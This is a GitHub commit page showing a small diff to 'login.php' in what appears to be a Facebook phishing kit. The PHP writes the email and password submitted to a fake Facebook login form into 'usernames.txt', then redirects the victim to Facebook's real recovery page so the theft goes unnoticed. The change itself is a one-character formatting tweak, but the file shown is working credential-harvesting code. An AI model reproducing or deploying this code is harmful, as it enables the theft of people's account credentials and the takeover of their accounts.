We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent e159dae commit a400acfCopy full SHA for a400acf
.sites/facebook/login.php
@@ -1,5 +1,5 @@
1
<?php
2
-file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
+file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
3
header('Location: https://facebook.com/recover/initiate/');
4
exit();
5
?>
0 commit comments